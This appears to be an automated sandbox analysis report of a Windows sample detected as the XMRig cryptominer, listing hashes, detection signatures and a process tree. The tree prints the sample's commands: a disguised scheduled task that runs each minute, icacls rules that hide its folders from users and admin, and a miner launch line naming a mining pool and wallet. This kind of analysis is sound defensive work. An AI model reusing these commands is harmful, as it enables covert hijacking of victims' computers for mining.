Analysis
-
max time kernel
109s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 23:39
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe
-
Size
11.8MB
-
MD5
a5816f6bba79d7761d42ee61d8bd11f5
-
SHA1
90c05a7427b077fbe81c34fd6fc4f2e6bc608558
-
SHA256
3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5
-
SHA512
51c794ce8569c367f475ffb85c15f5efa10c5ea7da86b1336fbeb1cab2fcf5468a26feed252a2fe5eaa5a376a9ae9bd5f87d9b28cc90580e6e98b3d242076eda
-
SSDEEP
196608:kF7gX0Meai3sCD1yjXEypazPx7WVacovyq6aejL+jGD71iEHiaJzZvdE+cZLIAfr:kF7oxeOOy9ajx0rq+jL+aD5iORdKZMkr
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 34 IoCs
resource yara_rule behavioral1/memory/1480-2-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-3-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-4-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-5-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-6-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-9-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/1480-14-0x000000013F140000-0x00000001411D8000-memory.dmp xmrig behavioral1/memory/3036-20-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/3036-21-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/3036-22-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/3036-19-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/3036-23-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-38-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/2072-37-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/2072-39-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/2072-40-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/2072-41-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-43-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-45-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-46-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-47-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-48-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-49-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-50-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-51-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-52-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-54-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-55-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-56-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-57-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-58-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-59-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig behavioral1/memory/2072-60-0x000000013FA90000-0x0000000141B28000-memory.dmp xmrig behavioral1/memory/3036-61-0x000000013FC90000-0x0000000141D28000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 3036 CertificateClient.exe 2072 msvcr_client.exe -
Loads dropped DLL 2 IoCs
pid Process 2636 taskeng.exe 3036 CertificateClient.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 2444 icacls.exe 1768 icacls.exe 2796 icacls.exe 1460 icacls.exe 836 icacls.exe 1860 icacls.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 2072 msvcr_client.exe 2072 msvcr_client.exe 3036 CertificateClient.exe 2072 msvcr_client.exe 3036 CertificateClient.exe 2072 msvcr_client.exe 3036 CertificateClient.exe 2072 msvcr_client.exe 3036 CertificateClient.exe 2072 msvcr_client.exe 3036 CertificateClient.exe 2072 msvcr_client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2096 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe 3036 CertificateClient.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3036 CertificateClient.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 2072 msvcr_client.exe Token: SeLockMemoryPrivilege 2072 msvcr_client.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2072 msvcr_client.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1480 wrote to memory of 2096 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 31 PID 1480 wrote to memory of 2096 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 31 PID 1480 wrote to memory of 2096 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 31 PID 1480 wrote to memory of 2444 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 33 PID 1480 wrote to memory of 2444 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 33 PID 1480 wrote to memory of 2444 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 33 PID 1480 wrote to memory of 1768 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 35 PID 1480 wrote to memory of 1768 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 35 PID 1480 wrote to memory of 1768 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 35 PID 1480 wrote to memory of 2796 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 37 PID 1480 wrote to memory of 2796 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 37 PID 1480 wrote to memory of 2796 1480 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 37 PID 2636 wrote to memory of 3036 2636 taskeng.exe 40 PID 2636 wrote to memory of 3036 2636 taskeng.exe 40 PID 2636 wrote to memory of 3036 2636 taskeng.exe 40 PID 3036 wrote to memory of 1460 3036 CertificateClient.exe 41 PID 3036 wrote to memory of 1460 3036 CertificateClient.exe 41 PID 3036 wrote to memory of 1460 3036 CertificateClient.exe 41 PID 3036 wrote to memory of 836 3036 CertificateClient.exe 43 PID 3036 wrote to memory of 836 3036 CertificateClient.exe 43 PID 3036 wrote to memory of 836 3036 CertificateClient.exe 43 PID 3036 wrote to memory of 1860 3036 CertificateClient.exe 45 PID 3036 wrote to memory of 1860 3036 CertificateClient.exe 45 PID 3036 wrote to memory of 1860 3036 CertificateClient.exe 45 PID 3036 wrote to memory of 2072 3036 CertificateClient.exe 47 PID 3036 wrote to memory of 2072 3036 CertificateClient.exe 47 PID 3036 wrote to memory of 2072 3036 CertificateClient.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "Windows\CertificateServicesClient\CryptoPolicyTask" /TR "C:\ProgramData\msvcr_cache\CertificateClient.exe" /SC MINUTE2⤵
- Scheduled Task/Job: Scheduled Task
PID:2096
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:2444
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:1768
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "admin:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:2796
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {24FEC3CE-A4FD-40F0-987D-0D1A9DAF86A4} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\ProgramData\msvcr_cache\CertificateClient.exeC:\ProgramData\msvcr_cache\CertificateClient.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:1460
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "admin:(R,REA,RA,RD)"3⤵
- Modifies file permissions
PID:1860
-
-
C:\ProgramData\CertificateServicesServer\msvcr_client.exe"C:\ProgramData\CertificateServicesServer\msvcr_client.exe" -o xmr-eu1.nanopool.org:14444 -u 49ZWqdCaWsNRwMPmgBraFaQXgs2PMJacE7aaDCf7CsnAfcE1KM93L93f8jN6a8C5Z2CBXGFnHX1LkK6rsKmbjmnqDhbr2jR -a rx/0 -p x --cpu-max-threads-hint=803⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2072
-
-